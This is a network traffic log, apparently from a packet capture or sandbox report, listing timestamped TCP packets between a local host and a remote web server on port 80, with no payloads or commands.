Nov 26, 2022 11:17:42.637732029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637742996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637761116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637763977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637780905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637799025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637825012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637834072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637840033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637851954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637871027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637888908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637907028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637907028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637924910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637929916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637943029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637960911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637967110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637979031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637996912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638017893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638039112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638536930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638557911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638576031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638595104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638613939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638623953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638633013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638648987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638652086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638670921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638681889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638689041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638708115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638712883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638725996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638745070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638763905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638763905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638782024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638791084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638802052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638819933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638830900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638838053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638855934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638856888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.638874054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638973951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638993025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.638995886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639012098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639019012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639030933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639062881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639467001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639484882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639502048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639519930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639544964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639555931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639564037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639575005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639595032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639614105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639621973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639631987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639632940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639652967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639671087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639689922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639694929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639708996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639720917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639728069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639746904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639751911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639765024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639784098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639796019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639801979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639821053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639838934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639839888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639858007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639866114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.639874935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639893055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.639899015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640419006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640439987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640453100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640458107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640475988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640489101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640495062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640512943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640516996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640532970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640552044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640571117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640578032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640588999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640607119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640609980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640626907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640634060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640645981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640665054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640676975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640682936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640702963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640705109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640721083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640739918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640759945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640763998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640779972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640791893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640805006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640825033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640830994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.640844107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.640886068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641380072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641400099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641417980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641437054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641438961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641469002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641494036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641513109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641531944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641546965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641550064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641570091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641572952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641587973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641607046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641625881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641628981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641644955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641657114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641664028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641684055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641702890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641706944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641721010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641733885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641741037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641758919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641777992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641781092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641796112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641807079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641815901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641834974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641839981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641853094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641870975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641891003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641891003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641908884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.641916990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.641951084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642479897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642498970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642517090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642538071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642555952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642556906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642574072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642591953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642604113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642611980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642621994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642630100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642648935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642656088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642667055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642685890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642688036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642704010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642723083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642728090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642741919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642760038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642779112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642784119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642796993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642805099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642817020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642834902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642839909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642853975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642868996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.642870903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642903090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.642949104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643385887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643405914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643424034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643441916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643452883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643460035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643477917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643491030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643497944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643516064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643517017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643532991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643533945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643553019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643570900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643573999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643589973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643608093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643625975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643645048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643656969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643665075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643668890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643683910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643693924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643702984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643721104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643738985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643745899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643758059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643774986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643775940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643811941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.643819094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.643851995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644320011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644339085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644359112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644376993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644397020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644406080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644417048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644432068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644437075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644455910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644462109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644474030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644493103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644507885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644512892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644540071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644558907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644567966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644578934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644592047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644598007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644617081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644617081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644635916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644654989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644659042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644674063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644691944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644692898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644711971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644730091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644737005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.644751072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.644787073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645277023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645297050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645315886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645330906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645335913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645354986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645359993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645374060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645392895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645395994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645411015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645431995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645451069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645457983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645468950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645486116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645487070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645505905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645510912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645524979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645544052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645555019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645562887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645581007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645601988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645605087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645621061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645627975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645639896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645658970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645659924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645678043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645697117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.645715952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.645740986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.647142887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.647265911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.647330046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.647380114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.647509098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.647635937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.648319006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.648401022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.648597002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.648641109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.648747921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.648793936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.648811102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649012089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649168015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649245024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649348974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649389982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649575949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649684906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649724007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649744034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649760962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649772882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649780989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649800062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649807930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649818897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649833918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649838924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649857998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649863005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649877071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649894953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649914026 CET	49707	80	192.168.2.5	66.235.200.147
